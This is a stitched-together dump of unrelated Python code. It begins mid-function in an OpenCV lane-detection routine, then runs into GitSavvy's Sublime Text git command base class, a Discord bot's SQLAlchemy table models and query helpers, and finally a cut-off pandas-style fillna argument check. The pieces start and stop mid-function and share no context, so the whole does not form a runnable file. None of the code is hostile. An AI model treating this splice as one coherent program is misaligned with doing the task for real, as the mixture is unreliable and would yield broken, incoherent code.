cv2.rectangle(out_img, (win_xleft_low, win_y_low), (win_xleft_high, win_y_high), (0, 255, 0), 2)
cv2.rectangle(out_img, (win_xright_low, win_y_low),(win_xright_high, win_y_high), (0, 255, 0), 2)
# Identifying non zero pixel in x and y within the window
good_left_inds = ((non_zero_y >= win_y_low) & (non_zero_y < win_y_high) &
(non_zero_x >= win_xleft_low) & (non_zero_x < win_xleft_high)).nonzero()[0]
good_right_inds = ((non_zero_y >= win_y_low) & (non_zero_y < win_y_high) &
(non_zero_x >= win_xright_low) & (non_zero_x < win_xright_high)).nonzero()[0]
# Appending the indices to the lists
left_lane_inds.append(good_left_inds)
right_lane_inds.append(good_right_inds)
# Recenter the upcoming window if minpix number of pixels are found
if len(good_left_inds) > minpix:
left_x_current = int(np.mean(non_zero_x[good_left_inds]))
if len(good_right_inds) > minpix:
right_x_current = int(np.mean(non_zero_x[good_right_inds]))
left_lane_inds = np.concatenate(left_lane_inds)
right_lane_inds = np.concatenate(right_lane_inds)
# Extract left and right line pixel positions
left_x = non_zero_x[left_lane_inds]
left_y = non_zero_y[left_lane_inds]
right_x = non_zero_x[right_lane_inds]
right_y = non_zero_y[right_lane_inds]
return left_x, left_y, right_x, right_y, out_img
def fit_polynomial(transformed_img):
# the pixel where non zero values are found are returned
left_x, left_y, right_x, right_y, out_img = find_lane_pixels(transformed_img)
# polynomial coefficients for left and right lanes are found and lines are created
left_fit = np.polyfit(left_y, left_x, 2)
right_fit = np.polyfit(right_y, right_x, 2)
ploty = np.linspace(0, transformed_img.shape[0] - 1, transformed_img.shape[0])
# Using the polynomial coefficients found from above, the left and right lane
# points are found
left_fit_x = left_fit[0] * ploty ** 2 + left_fit[1] * ploty + left_fit[2]
right_fit_x = right_fit[0] * ploty ** 2 + right_fit[1] * ploty + right_fit[2]
# Update previous poly - in this case they will be updated from zero
global left_fit_poly
left_fit_poly = left_fit
global right_fit_poly
right_fit_poly = right_fit
# Visualization ##
# Colors in the left and right lane regions
out_img[left_y, left_x] = [255, 0, 0]
out_img[right_y, right_x] = [0, 0, 255]
# Plots the left and right polynomials on the lane lines
# plt.plot(left_fit_x, ploty, color='yellow')
# plt.plot(right_fit_x, ploty, color='yellow')
return out_img, left_fit_x, right_fit_x, ploty, left_fit, right_fit
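# Illustrative sketch (commented out): fitting the lane polynomials on a warped binary
# frame produced by the pipeline sketched above; `warped` is assumed to come from
# perspective_transform().
# lane_img, left_x_fit, right_x_fit, ploty, left_fit, right_fit = fit_polynomial(warped)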
def search_around_polynomial(binary_warped, left_fit_prev, right_fit_prev):
# This the margin around previously found polynomial where lanes will be searched
margin = 70
# Grab the activated pixels
nonzero = binary_warped.nonzero()
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
# Here the area of search based on activated x-values within the +/- margin
# of the previously found polynomial function is set
left_lane_inds = ((nonzerox > (left_fit_prev[0]*(nonzeroy**2) + left_fit_prev[1]*nonzeroy +
left_fit_prev[2] - margin)) & (nonzerox < (left_fit_prev[0]*(nonzeroy**2) +
left_fit_prev[1]*nonzeroy + left_fit_prev[2] + margin)))
right_lane_inds = ((nonzerox > (right_fit_prev[0]*(nonzeroy**2) + right_fit_prev[1]*nonzeroy +
right_fit_prev[2] - margin)) & (nonzerox < (right_fit_prev[0]*(nonzeroy**2) +
right_fit_prev[1]*nonzeroy + right_fit_prev[2] + margin)))
# Extract left and right lane activated pixels
leftx = nonzerox[left_lane_inds]
lefty = nonzeroy[left_lane_inds]
rightx = nonzerox[right_lane_inds]
righty = nonzeroy[right_lane_inds]
# Fit new polynomial
left_fit = np.polyfit(lefty, leftx, 2)
right_fit = np.polyfit(righty, rightx, 2)
ploty = np.linspace(0, binary_warped.shape[0] - 1, binary_warped.shape[0])
# Using polynomial coefficients from above, left and right lane points are found
left_fit_x = left_fit[0] * ploty ** 2 + left_fit[1] * ploty + left_fit[2]
right_fit_x = right_fit[0] * ploty ** 2 + right_fit[1] * ploty + right_fit[2]
# Update array for previous polynomials
global left_fit_poly
left_fit_poly = left_fit
global right_fit_poly
right_fit_poly = right_fit
# Visualization ##
# Create an image to draw on and an image to show the selection window
out_img = np.dstack((binary_warped, binary_warped, binary_warped)) * 255
window_img = np.zeros_like(out_img)
# Color in left and right line pixels
out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]
out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]
# Generate a polygon to illustrate the search window area
# And recast the x and y points into usable format for cv2.fillPoly()
left_line_window1 = np.array([np.transpose(np.vstack([left_fit_x - margin, ploty]))])
left_line_window2 = np.array([np.flipud(np.transpose(np.vstack([left_fit_x + margin, ploty])))])
left_line_pts = np.hstack((left_line_window1, left_line_window2))
right_line_window1 = np.array([np.transpose(np.vstack([right_fit_x - margin, ploty]))])
right_line_window2 = np.array([np.flipud(np.transpose(np.vstack([right_fit_x + margin, ploty])))])
right_line_pts = np.hstack((right_line_window1, right_line_window2))
# Draw the lane onto the warped blank image
cv2.fillPoly(window_img, np.int_([left_line_pts]), (0, 255, 0))
cv2.fillPoly(window_img, np.int_([right_line_pts]), (0, 255, 0))
"""
Define a base command class that:
1) provides a consistent interface with `git`,
2) implements common git operations in one place, and
3) tracks file- and repo-specific data that is necessary
for Git operations.
"""
from collections import deque, ChainMap
import io
from itertools import chain, repeat
from functools import partial
import locale
import os
import re
import shutil
import stat
import subprocess
import time
import traceback
import sublime
from ..common import util
from .settings import SettingsMixin
from GitSavvy.core.fns import filter_
from GitSavvy.core.runtime import enqueue_on_worker, run_as_future
from GitSavvy.core.utils import paths_upwards, resolve_path
MYPY = False
if MYPY:
from typing import Callable, Deque, Dict, Iterator, List, Optional, Sequence, Tuple, Union
git_path = None
error_message_displayed = False
repo_paths = {} # type: Dict[str, str]
git_dirs = {} # type: Dict[str, str]
DECODE_ERROR_MESSAGE = """
The Git command returned data that could not be decoded. This may happen
if you have checked binary data into your repository, or if your files are
not UTF-8 encoded. In the latter case, use the 'fallback_encoding' setting.
-- Partially decoded output follows; � denotes decoding errors --
"""
MIN_GIT_VERSION = (2, 18, 0)
GIT_TOO_OLD_MSG = "Your Git version is too old. GitSavvy requires {:d}.{:d}.{:d} or above."
NOT_SET = "<NOT_SET>"
def communicate_and_log(proc, stdin, log):
# type: (subprocess.Popen, bytes, Callable[[bytes], None]) -> Tuple[bytes, bytes]
"""
Emulates Popen.communicate
Writes stdin (if provided)
Logs output from both stdout and stderr
Returns stdout, stderr
"""
if stdin is not None:
assert proc.stdin
proc.stdin.write(stdin)
proc.stdin.flush()
proc.stdin.close()
stdout, stderr = b'', b''
for line in stream_stdout_and_err(proc):
if isinstance(line, Out):
stdout += line
log(line)
elif isinstance(line, Err):
stderr += line
log(line)
return stdout, stderr
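# Illustrative usage sketch (commented out, not GitSavvy API): stream the output of a
# plain `git status` call through `communicate_and_log`, collecting log lines in a list.
# proc = subprocess.Popen(
#     ["git", "status"],
#     stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# log_lines = []
# stdout, stderr = communicate_and_log(proc, None, log_lines.append)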
class Out(bytes): pass # noqa: E701
class Err(bytes): pass # noqa: E701
def read_linewise(fh, kont):
# type: (io.BufferedReader, Callable[[bytes], None]) -> None
for line in iter(fh.readline, b''):
kont(line)
def stream_stdout_and_err(proc):
# type: (subprocess.Popen) -> Iterator[bytes]
container = deque() # type: Deque[bytes]
append = container.append
out_f = run_as_future(read_linewise, proc.stdout, lambda line: append(Out(line)))
err_f = run_as_future(read_linewise, proc.stderr, lambda line: append(Err(line)))
delay = chain([1, 2, 4, 8, 15, 30], repeat(50))
with proc:
while out_f.running() or err_f.running():
try:
yield container.popleft()
except IndexError:
time.sleep(next(delay) / 1000)
# Check and raise exceptions if any
out_f.result()
err_f.result()
yield from container
STARTUPINFO = None
if os.name == "nt":
STARTUPINFO = subprocess.STARTUPINFO()
STARTUPINFO.dwFlags |= subprocess.STARTF_USESHOWWINDOW
HOME = os.path.expanduser('~')
def __search_for_git(folder):
# type: (str) -> Optional[str]
for p in paths_upwards(folder):
if is_git_directory(os.path.join(p, ".git")):
return p
if p == HOME:
break
return None
def is_git_directory(suspect):
# type: (str) -> bool
try:
st = os.stat(suspect)
except (OSError, ValueError):
return False
if not stat.S_ISDIR(st.st_mode):
# A plain `.git` *file* (a gitfile, as used by worktrees and submodules) is also valid.
return True
# Test if the dir looks like a git dir. `HEAD` is mandatory.
ok = os.path.exists(os.path.join(suspect, "HEAD"))
if not ok:
util.debug.dprint("fatal: {} has no HEAD file.".format(suspect))
return ok
def search_for_git(folder):
# type: (str) -> Optional[str]
util.debug.dprint("searching .git upwards, starting at ", folder)
try:
return __search_for_git(folder)
except Exception as e:
util.debug.dprint("searching raised: {}".format(e))
return None
def search_for_git_toplevel(start_folder):
# type: (str) -> Optional[str]
real_start_folder = resolve_path(start_folder)
real_repo_path = search_for_git(real_start_folder)
if real_start_folder == start_folder:
return real_repo_path
if not real_repo_path:
return None
user_repo_path = search_for_git(start_folder)
if user_repo_path and os.path.samefile(real_repo_path, user_repo_path):
return user_repo_path
return real_repo_path
def git_version_from_path(git_path):
try:
stdout = subprocess.check_output(
[git_path, "--version"],
stderr=subprocess.PIPE,
startupinfo=STARTUPINFO
).decode()
except Exception:
stdout = ""
match = re.match(r"git version ([0-9]+)\.([0-9]+)\.([0-9]+)", stdout)
if match:
version = tuple(map(int, match.groups()))
return version
else:
return None
def is_subpath(topfolder, path):
# type: (str, str) -> bool
return os.path.commonprefix([topfolder, path]) == topfolder
class _GitCommand(SettingsMixin):
"""
Base class for all Sublime commands that interact with git.
"""
def git(
self,
git_cmd,
*args,
stdin=None,
working_dir=None,
show_panel=None,
show_panel_on_error=True,
throw_on_error=True,
decode=True,
stdin_encoding="utf-8",
custom_environ=None,
just_the_proc=False
):
"""
Run the git command specified in `*args` and return the output
of the git command as a string.
If stdin is provided, it should be a string and will be piped to
the git process. If `working_dir` is provided, set this as the
current working directory for the git process; otherwise,
the `repo_path` value will be used.
"""
window = self.some_window()
final_args = self._add_global_flags(git_cmd, list(args))
command = [self.git_binary_path] + list(filter_(final_args))
command_str = " ".join(["git"] + command[1:])
if show_panel is None:
show_panel = git_cmd in self.savvy_settings.get("show_panel_for")
if show_panel:
panel = util.log.init_panel(window)
log = partial(util.log.append_to_panel, panel)
log("$ {}\n".format(command_str))
if not working_dir:
try:
working_dir = self.repo_path
except RuntimeError as e:
# do not show panel when the window does not exist
raise GitSavvyError(str(e), show_panel=False, window=window)
except Exception as e:
raise GitSavvyError(str(e), show_panel=show_panel_on_error, window=window)
stdout, stderr = None, None
environ = ChainMap(
custom_environ or {},
self.savvy_settings.get("env") or {},
os.environ
)
try:
start = time.time()
p = subprocess.Popen(
command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=working_dir,
env=environ,
startupinfo=STARTUPINFO
)
if just_the_proc:
return p
if isinstance(stdin, str):
stdin = stdin.encode(encoding=stdin_encoding)
if show_panel:
log_b = lambda line: log(line.decode("utf-8", "replace"))
stdout, stderr = communicate_and_log(p, stdin, log_b)
else:
stdout, stderr = p.communicate(stdin)
except Exception as e:
# this should never be reached
raise GitSavvyError(
"$ {} ({})\n\n"
"Please report this error to GitSavvy:\n\n{}\n\n{}".format(
command_str, working_dir, e, traceback.format_exc()
),
cmd=command,
show_panel=show_panel_on_error,
window=window
)
finally:
if not just_the_proc:
end = time.time()
util.debug.log_git(final_args, working_dir, stdin, stdout, stderr, end - start)
if show_panel:
log("\n[Done in {:.2f}s]".format(end - start))
if decode:
try:
stdout, stderr = self.strict_decode(stdout), self.strict_decode(stderr) # type: ignore[assignment]
except UnicodeDecodeError:
stdout_s = stdout.decode("utf-8", "replace")
stderr_s = stderr.decode("utf-8", "replace")
raise GitSavvyError(
"$ {}\n{}{}{}".format(
command_str,
DECODE_ERROR_MESSAGE,
stdout_s,
stderr_s,
),
cmd=command,
stdout=stdout_s,
stderr=stderr_s,
show_panel=show_panel_on_error,
window=window
)
if throw_on_error and not p.returncode == 0:
stdout_s, stderr_s = self.ensure_decoded(stdout), self.ensure_decoded(stderr)
if "*** Please tell me who you are." in stderr_s:
show_panel_on_error = False
sublime.set_timeout_async(
lambda: sublime.active_window().run_command("gs_setup_user"))
raise GitSavvyError(
"$ {}\n\n{}{}".format(command_str, stdout_s, stderr_s),
cmd=command,
stdout=stdout_s,
stderr=stderr_s,
# If `show_panel` is set, we log *while* running the process
# and thus don't need to log again.
show_panel=show_panel_on_error and not show_panel,
window=window
)
return stdout
def git_throwing_silently(self, *args, **kwargs):
return self.git(
*args,
throw_on_error=True,
show_panel_on_error=False,
**kwargs
)
def get_encoding_candidates(self):
# type: () -> Sequence[str]
return [
'utf-8',
locale.getpreferredencoding(),
self.savvy_settings.get("fallback_encoding")
]
def strict_decode(self, input):
# type: (bytes) -> str
encodings = self.get_encoding_candidates()
decoded, _ = self.try_decode(input, encodings)
return decoded
def ensure_decoded(self, input):
# type: (Union[str, bytes]) -> str
if isinstance(input, str):
return input
return self.lax_decode(input)
def lax_decode(self, input):
# type: (bytes) -> str
try:
return self.strict_decode(input)
except UnicodeDecodeError:
return input.decode("utf-8", "replace")
def try_decode(self, input, encodings):
# type: (bytes, Sequence[str]) -> Tuple[str, str]
for n, encoding in enumerate(encodings, start=1):
try:
return input.decode(encoding), encoding
except UnicodeDecodeError as err:
if n == len(encodings):
raise err
assert False # no silent fall-through
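# Illustrative sketch: bytes that are not valid UTF-8 fall through to the next
# candidate encoding, e.g. (values assumed for demonstration)
#   self.try_decode("café".encode("latin-1"), ["utf-8", "latin-1"])
# returns ("café", "latin-1"); only if every candidate fails is the
# UnicodeDecodeError re-raised.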
@property
def git_binary_path(self):
"""
Return the path to the available `git` binary.
"""
global git_path, error_message_displayed
if not git_path:
git_path_setting = self.savvy_settings.get("git_path")
if isinstance(git_path_setting, dict):
git_path = git_path_setting.get(sublime.platform())
if not git_path:
git_path = git_path_setting.get('default')
else:
git_path = git_path_setting
if not git_path:
git_path = shutil.which("git")
if git_path:
version = git_version_from_path(git_path)
if version:
if version < MIN_GIT_VERSION:
msg = GIT_TOO_OLD_MSG.format(*MIN_GIT_VERSION)
git_path = None
if not error_message_displayed:
sublime.error_message(msg)
error_message_displayed = True
raise ValueError("Git binary too old.")
else:
git_path = None
if not git_path:
msg = ("Your Git binary cannot be found. If it is installed, add it "
"to your PATH environment variable, or add a `git_path` setting "
"in the GitSavvy settings.")
if not error_message_displayed:
sublime.error_message(msg)
error_message_displayed = True
raise ValueError("Git binary not found.")
return git_path
def _current_window(self):
# type: () -> Optional[sublime.Window]
try:
return self.window # type: ignore[attr-defined]
except AttributeError:
return self.view.window() # type: ignore[attr-defined]
def _current_view(self):
# type: () -> Optional[sublime.View]
try:
return self.view # type: ignore[attr-defined]
except AttributeError:
return self.window.active_view() # type: ignore[attr-defined]
def _current_filename(self):
# type: () -> Optional[str]
try:
return self.view.file_name() # type: ignore[attr-defined]
except AttributeError:
return self.window.extract_variables().get("file") # type: ignore[attr-defined]
def _search_paths(self):
# type: () -> Iterator[str]
def __search_paths():
# type: () -> Iterator[str]
file_name = self._current_filename()
if file_name and not os.path.isfile(file_name):
file_name = None
if file_name:
yield os.path.dirname(file_name)
window = self._current_window()
if window:
folders = window.folders()
if folders:
if (
not file_name
or not is_subpath(resolve_path(folders[0]), resolve_path(file_name))
):
yield folders[0]
return filter(os.path.isdir, __search_paths())
def find_repo_path(self):
# type: () -> Optional[str]
view = self._current_view()
repo_path = view.settings().get("git_savvy.repo_path") if view else None
if repo_path and os.path.exists(repo_path):
return repo_path
return next(filter_(map(self._find_git_toplevel, self._search_paths())), None)
def _find_git_toplevel(self, folder):
# type: (str) -> Optional[str]
try:
return repo_paths[folder]
except KeyError:
repo_path = search_for_git_toplevel(folder)
if repo_path:
util.debug.dprint("using ", os.path.join(repo_path, ".git"))
repo_paths[folder] = repo_path
else:
util.debug.dprint("no .git found")
<reponame>11Tuvork28/M3E5
from sqlalchemy.dialects.mysql import CHAR
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, String, FLOAT, BIGINT, DATETIME, ForeignKey, VARCHAR, TEXT, BOOLEAN
from sqlalchemy.orm import relationship
from base_folder.config import Session
'''
Each of the following classes represents its corresponding database table.
'''
Base = declarative_base()
class Banlist(Base):
__tablename__ = "blacklist"
id = Column(BIGINT, primary_key=True, autoincrement=True)
user_id = Column(BIGINT)
class BannedChannelsCmds(Base):
__tablename__ = "banned_channels_cmds"
id = Column(Integer, primary_key=True, autoincrement=True)
guild_id = Column(BIGINT, ForeignKey('guilds.guild_id'))
channel_id = Column(BIGINT, ForeignKey('channels.channel_id'))
cmd_id = Column(BIGINT, ForeignKey('commands.id'))
guilds = relationship("Guild", back_populates="banned_channels_cmds")
channels = relationship("Channels", back_populates="banned_channels_cmds")
commands = relationship("Commands", back_populates="banned_channels_cmds")
class BannedRolesCmds(Base):
__tablename__ = "banned_roles_cmds"
id = Column(Integer, primary_key=True, autoincrement=True)
guild_id = Column(BIGINT, ForeignKey('guilds.guild_id'))
role_id = Column(BIGINT, ForeignKey("roles.role_id"))
cmd_id = Column(BIGINT, ForeignKey('commands.id'))
guilds = relationship("Guild", back_populates="banned_roles_cmds")
roles = relationship("Roles", back_populates="banned_roles_cmds")
commands = relationship("Commands", back_populates="banned_roles_cmds")
class BannedUsersCmds(Base):
__tablename__ = "banned_users_cmds"
id = Column(Integer, primary_key=True, autoincrement=True)
guild_id = Column(BIGINT, ForeignKey('guilds.guild_id'))
user_id = Column(BIGINT, ForeignKey('user_info.user_id'))
cmd_id = Column(BIGINT, ForeignKey('commands.id'))
guilds = relationship("Guild", back_populates="banned_users_cmds")
user_info = relationship("UserInfo", back_populates="banned_users_cmds")
commands = relationship("Commands", back_populates="banned_users_cmds")
class BannedChannelsSpam(Base):
__tablename__ = "banned_channels_spam"
guild_id = Column(BIGINT, ForeignKey('guilds.guild_id'))
channel_id = Column(BIGINT, ForeignKey('channels.channel_id'), primary_key=True)
guilds = relationship("Guild", back_populates="banned_channels_spam")
channels = relationship("Channels", back_populates="banned_channels_spam")
class BannedRolesSpam(Base):
__tablename__ = "banned_roles_spam"
guild_id = Column(BIGINT, ForeignKey('guilds.guild_id'))
role_id = Column(BIGINT, ForeignKey("roles.role_id"), primary_key=True)
guilds = relationship("Guild", back_populates="banned_roles_spam")
roles = relationship("Roles", back_populates="banned_roles_spam")
class BannedUsersSpam(Base):
__tablename__ = "banned_users_spam"
guild_id = Column(BIGINT, ForeignKey('guilds.guild_id'))
user_id = Column(BIGINT, ForeignKey('user_info.user_id'), primary_key=True)
guilds = relationship("Guild", back_populates="banned_users_spam")
user_info = relationship("UserInfo", back_populates="banned_users_spam")
class Channels(Base):
__tablename__ = "channels"
guild_id = Column(BIGINT, ForeignKey('guilds.guild_id'), primary_key=True)
channel_name = Column(VARCHAR(length=150))
channel_id = Column(BIGINT)
guilds = relationship("Guild", back_populates="channels")
banned_channels_spam = relationship("BannedChannelsSpam", back_populates="channels")
banned_channels_cmds = relationship("BannedChannelsCmds", back_populates="channels")
class Commands(Base):
__tablename__ = "commands"
id = Column(Integer, primary_key=True, autoincrement=True)
command_name = Column(VARCHAR(length=100))
banned_channels_cmds = relationship("BannedChannelsCmds", back_populates="commands")
banned_roles_cmds = relationship("BannedRolesCmds", back_populates="commands")
banned_users_cmds = relationship("BannedUsersCmds", back_populates="commands")
class Errors(Base):
__tablename__ = "Error"
id = Column(BIGINT, primary_key=True, autoincrement=True)
guild_id = Column(BIGINT, ForeignKey('guilds.guild_id'))
error = Column(VARCHAR(length=2000))
date = Column(DATETIME)
guilds = relationship("Guild", back_populates="Error")
class Guild(Base):
__tablename__ = "guilds"
guild_id = Column(BIGINT, primary_key=True)
channels = relationship("Channels", back_populates="guilds")
banned_channels_cmds = relationship("BannedChannelsCmds", back_populates="guilds")
banned_roles_cmds = relationship("BannedRolesCmds", back_populates="guilds")
banned_users_cmds = relationship("BannedUsersCmds", back_populates="guilds")
banned_channels_spam = relationship("BannedChannelsSpam", back_populates="guilds")
banned_roles_spam = relationship("BannedRolesSpam", back_populates="guilds")
banned_users_spam = relationship("BannedUsersSpam", back_populates="guilds")
Error = relationship("Errors", back_populates="guilds")
user_info = relationship("UserInfo", back_populates="guilds")
messages = relationship("Messages", back_populates="guilds")
profiles = relationship("Profiles", back_populates="guilds")
reactions = relationship("Reaction", back_populates="guilds")
roles = relationship("Roles", back_populates="guilds")
settings = relationship("Settings", back_populates="guilds")
class Messages(Base):
__tablename__ = "messages"
id = Column(BIGINT, primary_key=True, autoincrement=True)
guild_id = Column(BIGINT, ForeignKey('guilds.guild_id'))
user_id = Column(BIGINT, ForeignKey('user_info.user_id'))
message_id = Column(BIGINT)
message = Column(TEXT)
time = Column(DATETIME)
guilds = relationship("Guild", back_populates="messages")
user_info = relationship("UserInfo", back_populates="messages")
reactions = relationship("Reaction", back_populates="messages")
class Profiles(Base):
__tablename__ = 'profiles'
id = Column(BIGINT, primary_key=True, autoincrement=True)
guild_id = Column(BIGINT, ForeignKey('guilds.guild_id'))
user_id = Column(BIGINT, ForeignKey('user_info.user_id'))
warnings = Column(Integer, default=0)
kickCount = Column(Integer, default=0)
text_xp = Column(Integer, default=0)
text_lvl = Column(Integer, default=0)
voice_xp = Column(Integer, default=0)
voice_lvl = Column(Integer, default=0)
banned_at = Column(DATETIME)
banned_until = Column(DATETIME)
muted_at = Column(DATETIME)
muted_until = Column(DATETIME)
guilds = relationship("Guild", back_populates="profiles")
user_info = relationship("UserInfo", back_populates="profiles")
class Reaction(Base):
__tablename__ = "reactions"
id = Column(BIGINT, primary_key=True, autoincrement=True)
guild_id = Column(BIGINT, ForeignKey('guilds.guild_id'))
message_id = Column(BIGINT, ForeignKey("messages.message_id"))
role_id = Column(BIGINT, ForeignKey("roles.role_id"))
emoji = Column(CHAR)
guilds = relationship("Guild", back_populates="reactions")
roles = relationship("Roles", back_populates="reactions")
messages = relationship("Messages", back_populates="reactions")
class Roles(Base):
__tablename__ = "roles"
guild_id = Column(BIGINT, ForeignKey('guilds.guild_id'))
role_id = Column(BIGINT, primary_key=True, autoincrement=True)
role_name = Column(VARCHAR(length=255))
guilds = relationship("Guild", back_populates="roles")
reactions = relationship("Reaction", back_populates="roles")
banned_roles_cmds = relationship("BannedRolesCmds", back_populates="roles")
banned_roles_spam = relationship("BannedRolesSpam", back_populates="roles")
class Settings(Base):
__tablename__ = "settings"
guild_id = Column(BIGINT, ForeignKey('guilds.guild_id'), primary_key=True, autoincrement=True, nullable=False)
# TODO: make relations to Roles table
# TODO: make relations to channels table
standard_role_id = Column(BIGINT, default=0)
dev_role_id = Column(BIGINT, default=0)
mod_role_id = Column(BIGINT, default=0)
admin_role_id = Column(BIGINT, default=0)
imgwelcome_toggle = Column(BOOLEAN, default=False)
imgwelcome_text = Column(VARCHAR(length=2000), default="V2VsY29tZSB0byB0aGUgc2VydmVyIHlvdSBsaXR0bGUgdXNlcg==")  # base64-encoded default: "Welcome to the server you little user"
levelsystem_toggle = Column(BOOLEAN, default=False)
welcome_channel_id = Column(BIGINT, default=0)
leave_channel_id = Column(BIGINT, default=0)
lvl_channel_id = Column(BIGINT, default=0)
cmd_channel_id = Column(BIGINT, default=0)
stdout_channel_id = Column(BIGINT, default=0)
warn_channel_id = Column(BIGINT, default=0)
kick_channel_id = Column(BIGINT, default=0)
ban_channel_id = Column(BIGINT, default=0)
prefix = Column(VARCHAR(length=20), default="LQ==")  # base64-encoded default: "-"
Color = Column(VARCHAR(length=25), default="default()")
leave_text = Column(VARCHAR(2000), default="VXNlciB1c2VyIGxlZnQgdGhlIHNlcnZlci4uLg==")  # base64-encoded default: "User user left the server..."
warnThreshold = Column(Integer, default=3)
kickThreshold = Column(Integer, default=2)
banThreshold = Column(Integer, default=2)
messageInterval = Column(Integer, default=2500)
warnMessage = Column(VARCHAR(length=2000), default="Hey $MENTIONUSER, please stop spamming/"
"sending duplicate messages.")
kickMessage = Column(VARCHAR(length=2000), default="$USERNAME was kicked for spamming/sending duplicate messages.")
banMessage = Column(VARCHAR(length=2000), default="$USERNAME was banned for spamming/sending duplicate messages.")
messageDuplicateCount = Column(Integer, default=5)
messageDuplicateAccuracy = Column(FLOAT, default=90)
ignoreBots = Column(BOOLEAN, default=True)
guilds = relationship("Guild", back_populates="settings")
class UserInfo(Base):
__tablename__ = 'user_info'
id = Column(BIGINT, primary_key=True, autoincrement=True)
user_id = Column(BIGINT)
username = Column(String)
guild_id = Column(BIGINT, ForeignKey('guilds.guild_id'))
guilds = relationship("Guild", back_populates="user_info")
messages = relationship("Messages", back_populates="user_info")
profiles = relationship("Profiles", back_populates="user_info")
banned_users_spam = relationship("BannedUsersSpam", back_populates="user_info")
banned_users_cmds = relationship("BannedUsersCmds", back_populates="user_info")
class Db:
"""
This class is more or less a layer on top of sqlalchemy,
that can read data from the database and represent it in useful forms.
TODO: add consistent error handling
"""
def __init__(self):
self._session = None
@property
def session(self):
# Lazily create the session on first access, then reuse it.
if self._session is None:
self._session = Session()
return self._session
def prefix_lookup(self, guild_id: int):
"""
:param guild_id: the id of the guild
:returns: the prefix for the given guild
"""
prefix = self.session.query(Settings.prefix).filter_by(guild_id=guild_id).one()
self.session.commit()
return prefix
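# Illustrative usage sketch (the guild id below is a made-up example):
#   db = Db()
#   prefix_row = db.prefix_lookup(123456789012345678)
# `one()` returns a single-element row, so callers typically index it, e.g. prefix_row[0].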
async def roles_from_db(self, guild_id: int):
# Returns a list of (role_name, role_id) tuples for the given guild
roles = self.session.query(Roles.role_name, Roles.role_id).filter_by(guild_id=guild_id).all()
self.session.commit()
return roles
async def get_admin_role(self, guild_id: int):
"""
:param guild_id: the id of the guild
:returns: the role id of the admin role for the given guild
"""
role_id = self.session.query(Settings.admin_role_id).filter_by(guild_id=guild_id).all()
self.session.commit()
return role_id[0]
async def get_dev_role(self, guild_id: int):
"""
:param guild_id: the id of the guild
:returns: the role id of the dev role for the given guild
"""
role_id = self.session.query(Settings.dev_role_id).filter_by(guild_id=guild_id).all()
self.session.commit()
return role_id[0]
async def get_mod_role(self, guild_id: int):
"""
:param guild_id: the id of the guild
:returns: the role id of the mod role for the given guild
"""
role_id = self.session.query(Settings.mod_role_id).filter_by(guild_id=guild_id).all()
self.session.commit()
return role_id[0]
async def get_standard_role(self, guild_id: int):
"""
:param guild_id: the id of the guild
:returns: the role id of the standard role for the given guild
"""
role_id = self.session.query(Settings.standard_role_id).filter_by(guild_id=guild_id).all()
self.session.commit()
return role_id[0]
async def get_warns(self, guild_id: int, user_id: int):
"""
:param guild_id: the id of the guild
:param user_id: the ID of the user
:returns: the warnings for the given user, can be 0
"""
warnings = self.session.query(Profiles.warnings).filter(Profiles.guild_id == guild_id,
Profiles.user_id == user_id).all()
self.session.commit()
if not warnings:
return 0
return warnings[0][0]
async def get_welcome_channel(self, guild_id: int):
"""
:param guild_id: the id of the guild
:returns: the welcome channel for the given guild
"""
welcome_channel = self.session.query(Settings.welcome_channel_id).filter_by(guild_id=guild_id).one()
self.session.commit()
return welcome_channel[0]
async def get_cmd_channel(self, guild_id: int):
"""
:param guild_id: the id of the guild
:returns: the command channel for the given guild
"""
cmd_channel = self.session.query(Settings.cmd_channel_id).filter_by(guild_id=guild_id).one()
self.session.commit()
return cmd_channel[0]
async def get_lvl_channel(self, guild_id: int):
"""
:param guild_id: the id of the guild
:returns: the level channel for the given guild
"""
lvl_channel = self.session.query(Settings.lvl_channel_id).filter_by(guild_id=guild_id).one()
self.session.commit()
return lvl_channel[0]
async def get_leave_channel(self, guild_id: int):
"""
:param guild_id: the id of the guild
:returns: the leave channel for the given guild
"""
leave_channel = self.session.query(Settings.leave_channel_id).filter_by(guild_id=guild_id).one()
self.session.commit()
return leave_channel[0]
async def get_stdout_channel(self, guild_id: int):
"""
:param guild_id: the id of the guild
:returns: the stdout(logging) channel for the given guild
"""
stdout_channel = self.session.query(Settings.stdout_channel_id).filter_by(guild_id=guild_id).one()
self.session.commit()
return stdout_channel[0]
async def get_warn_channel(self, guild_id: int):
"""
:param guild_id: the id of the guild
:returns: the warn(logging) channel for the given guild
"""
stdout_channel = self.session.query(Settings.warn_channel_id).filter_by(guild_id=guild_id).one()
self.session.commit()
return stdout_channel[0]
async def get_kick_channel(self, guild_id: int):
"""
:param guild_id: the id of the guild
:returns: the kick(logging) channel for the given guild
"""
stdout_channel = self.session.query(Settings.kick_channel_id).filter_by(guild_id=guild_id).one()
self.session.commit()
return stdout_channel[0]
async def get_ban_channel(self, guild_id: int):
"""
:param guild_id: the id of the guild
:returns: the ban(logging) channel for the given guild
"""
stdout_channel = self.session.query(Settings.ban_channel_id).filter_by(guild_id=guild_id).one()
self.session.commit()
return stdout_channel[0]
async def get_leave_text(self, guild_id: int):
"""
:param guild_id: the id of the guild
:returns: the leave text for the given guild
"""
leave_text = self.session.query(Settings.leave_text).filter_by(guild_id=guild_id).all()
self.session.commit()
return leave_text[0][0]
async def get_img(self, guild_id: int):
"""
:param guild_id: the id of the guild
:returns: whether the welcome image is on or off for the given guild
"""
img = self.session.query(Settings.imgwelcome_toggle).filter_by(guild_id=guild_id).all()
self.session.commit()
return img[0][0]
4
"""
if axis is None:
axis = 0
if not (axis == 0 or axis == "index"):
raise NotImplementedError("fillna currently only works for axis=0 or axis='index'")
if value is None:
raise ValueError('Currently must specify value')
if not isinstance(value, (float, int, str, bool, dict, pd.Series)):
raise TypeError("Unsupported type %s" % type(value))
if isinstance(value, pd.Series):
value = value.to_dict()
if isinstance(value, dict):
for v in value.values():
if not isinstance(v, (float, int, str, bool)):
raise TypeError("Unsupported type %s" % type(v))
